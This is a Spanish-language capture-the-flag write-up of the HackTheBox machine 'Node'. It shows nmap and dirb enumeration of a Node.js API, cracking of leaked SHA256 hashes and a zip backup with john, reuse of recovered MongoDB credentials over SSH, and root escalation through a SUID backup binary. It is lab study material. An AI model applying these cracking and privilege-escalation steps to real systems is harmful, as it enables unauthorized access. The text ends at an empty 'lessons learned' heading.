HackTheBox Medium Linux Node.js API MongoDB SUID zip2john

Node

API Node.js expone hashes; backup cifrado crackeable; MongoDB para pivotar; SUID binary para escalada root.

cat4clysm
Herramientas utilizadas
nmap dirb john zip2john netcat

Scanning

root@kali:~$
nmap -sC -sV -p22,3000 -Pn -n 10.10.10.58 -oN targeted
nmap scan

Puerto 3000 - API Node.js

root@kali:~$
dirb http://10.10.10.58:3000 -a "gaogao"
dirb source code API users

En /api/users encontramos hashes SHA256 de contrasenas:

myP14ceAdm1nAcc0uNT: dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
# Crackeado: manchester
crackstation

Backup cifrado - Password cracking

admin panel backup
root@kali:~$
cat myplace.backup | base64 -d > myplace
zip2john myplace > myplace.john
john --wordlist=/usr/share/wordlists/rockyou.txt myplace.john
# password: magicword
unzip myplace
mongodb credentials 
mark: 5AYRft73VtFpc84k

SSH + MongoDB + SUID

root@kali:~$
ssh [email protected]
ps aux | grep tom
process
root@kali:~$
cat /var/scheduler/app.js
app.js mongodb

Encontramos un binario SUID para escalada:

suid
root@kali:~$
export HOME=/root
backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "~"
root flag

Lecciones aprendidas